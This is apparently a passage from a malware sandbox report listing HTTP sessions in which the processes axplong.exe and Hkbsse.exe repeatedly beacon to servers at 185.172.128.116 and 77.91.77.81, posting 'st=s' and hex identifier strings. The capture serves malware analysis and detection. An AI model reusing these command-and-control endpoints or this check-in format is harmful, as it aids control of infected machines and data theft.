Jun 24, 2024 00:10:41.565449953 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:42.228255987 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:42.229779005 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:42.425456047 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49801	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:41.831228018 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:42.520742893 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:42.521780014 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:10:42.741722107 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	49803	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:42.539463043 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:43.193326950 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:43.194062948 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:43.390325069 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	49804	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:42.864012003 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:43.542473078 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:43.543147087 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:10:43.756761074 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	49806	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:43.502454996 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:44.143012047 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:44.162507057 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:44.352813959 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	52891	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:43.878001928 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:44.590435982 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:44.591232061 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:10:44.816622972 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	52895	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:44.467315912 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:45.118287086 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:45.119440079 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:45.313201904 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	52896	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:44.930763006 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:45.615103006 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:45.615875959 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:10:45.833659887 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	52898	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:45.431298971 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:46.261192083 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:46.261912107 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:46.452320099 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	52899	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:45.946367979 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:46.644236088 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:46.645133018 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:10:46.863181114 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	52900	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:46.565686941 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:47.217211008 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:47.218137026 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:47.412061930 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	52901	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:46.982374907 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:47.670459032 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:47.672811031 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:10:47.893157959 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	52902	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:47.523183107 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:48.160651922 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:48.161382914 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: 